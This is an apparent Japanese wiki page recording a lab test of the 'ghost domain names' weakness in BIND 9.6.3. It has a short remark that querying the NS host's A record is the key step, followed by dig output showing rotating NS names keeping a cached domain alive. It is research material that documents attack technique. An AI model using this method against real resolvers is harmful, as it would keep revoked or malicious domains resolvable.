DNS/脆弱性/GhostDomainNames/ghost2/bind-9.6.3

DNS/ghost2/bind-9.6.3について、ここに記述してください。
論文の攻撃法をよく読んで、NS値のホストのAレコードをqueryすることが肝心だと分かった。
要はBINDの穴（防御欠陥）
22:29m6%dig a  www.ghost2.qmail.jp                                 ~/dnsdata

; <<>> DiG 9.6.3 <<>> a www.ghost2.qmail.jp
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 31612
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 1

;; QUESTION SECTION:
;www.ghost2.qmail.jp.           IN      A

;; ANSWER SECTION:
www.ghost2.qmail.jp.    11      IN      A       202.41.218.242

;; AUTHORITY SECTION:
ghost2.qmail.jp.        3331    IN      NS      2225.ns.ghost2.qmail.jp.

;; ADDITIONAL SECTION:
2225.ns.ghost2.qmail.jp. 3331   IN      A       202.41.218.242

;; Query time: 0 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Tue Feb 28 22:29:56 2012
;; MSG SIZE  rcvd: 91

22:29m6%dig a  www.ghost2.qmail.jp                                 ~/dnsdata

; <<>> DiG 9.6.3 <<>> a www.ghost2.qmail.jp
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 49818
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 1

;; QUESTION SECTION:
;www.ghost2.qmail.jp.           IN      A

;; ANSWER SECTION:
www.ghost2.qmail.jp.    296     IN      A       202.41.218.242

;; AUTHORITY SECTION:
ghost2.qmail.jp.        3314    IN      NS      2225.ns.ghost2.qmail.jp.

;; ADDITIONAL SECTION:
2225.ns.ghost2.qmail.jp. 3314   IN      A       202.41.218.242

;; Query time: 0 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Tue Feb 28 22:30:13 2012
;; MSG SIZE  rcvd: 91

22:30m6%dig a  2230.ns.ghost2.qmail.jp                             ~/dnsdata

; <<>> DiG 9.6.3 <<>> a 2230.ns.ghost2.qmail.jp
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 31951
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;2230.ns.ghost2.qmail.jp.       IN      A

;; ANSWER SECTION:
2230.ns.ghost2.qmail.jp. 3600   IN      A       202.41.218.242

;; AUTHORITY SECTION:
ghost2.qmail.jp.        3600    IN      NS      2230.ns.ghost2.qmail.jp.

;; Query time: 9 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Tue Feb 28 22:30:25 2012
;; MSG SIZE  rcvd: 71

22:30m6%dig a  www.ghost2.qmail.jp                                 ~/dnsdata

; <<>> DiG 9.6.3 <<>> a www.ghost2.qmail.jp
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 7608
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 1

;; QUESTION SECTION:
;www.ghost2.qmail.jp.           IN      A

;; ANSWER SECTION:
www.ghost2.qmail.jp.    276     IN      A       202.41.218.242

;; AUTHORITY SECTION:
ghost2.qmail.jp.        3592    IN      NS      2230.ns.ghost2.qmail.jp.

;; ADDITIONAL SECTION:
2230.ns.ghost2.qmail.jp. 3592   IN      A       202.41.218.242

;; Query time: 0 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Tue Feb 28 22:30:33 2012
;; MSG SIZE  rcvd: 91

22:30m6%dig a  www.ghost2.qmail.jp                                 ~/dnsdata

; <<>> DiG 9.6.3 <<>> a www.ghost2.qmail.jp
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 31541
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 1

;; QUESTION SECTION:
;www.ghost2.qmail.jp.           IN      A

;; ANSWER SECTION:
www.ghost2.qmail.jp.    109     IN      A       202.41.218.242

;; AUTHORITY SECTION:
ghost2.qmail.jp.        3425    IN      NS      2230.ns.ghost2.qmail.jp.

;; ADDITIONAL SECTION:
2230.ns.ghost2.qmail.jp. 3425   IN      A       202.41.218.242

;; Query time: 0 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Tue Feb 28 22:33:20 2012
;; MSG SIZE  rcvd: 91

22:33m6%dig a  www.ghost2.qmail.jp                                 ~/dnsdata

; <<>> DiG 9.6.3 <<>> a www.ghost2.qmail.jp
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 28057
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 1

;; QUESTION SECTION:
;www.ghost2.qmail.jp.           IN      A

;; ANSWER SECTION:
www.ghost2.qmail.jp.    240     IN      A       202.41.218.242

;; AUTHORITY SECTION:
ghost2.qmail.jp.        3255    IN      NS      2230.ns.ghost2.qmail.jp.

;; ADDITIONAL SECTION:
2230.ns.ghost2.qmail.jp. 3255   IN      A       202.41.218.242

;; Query time: 0 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Tue Feb 28 22:36:10 2012
;; MSG SIZE  rcvd: 91

22:36m6%dig a  2235.ns.ghost2.qmail.jp                             ~/dnsdata

; <<>> DiG 9.6.3 <<>> a 2235.ns.ghost2.qmail.jp
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6646
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;2235.ns.ghost2.qmail.jp.       IN      A

;; ANSWER SECTION:
2235.ns.ghost2.qmail.jp. 3600   IN      A       202.41.218.242

;; AUTHORITY SECTION:
ghost2.qmail.jp.        3600    IN      NS      2235.ns.ghost2.qmail.jp.

;; Query time: 9 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Tue Feb 28 22:36:26 2012
;; MSG SIZE  rcvd: 71

22:36m6%dig a  www.ghost2.qmail.jp                                 ~/dnsdata

; <<>> DiG 9.6.3 <<>> a www.ghost2.qmail.jp
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 57162
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 1

;; QUESTION SECTION:
;www.ghost2.qmail.jp.           IN      A

;; ANSWER SECTION:
www.ghost2.qmail.jp.    217     IN      A       202.41.218.242

;; AUTHORITY SECTION:
ghost2.qmail.jp.        3593    IN      NS      2235.ns.ghost2.qmail.jp.

;; ADDITIONAL SECTION:
2235.ns.ghost2.qmail.jp. 3593   IN      A       202.41.218.242

;; Query time: 0 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Tue Feb 28 22:36:33 2012
;; MSG SIZE  rcvd: 91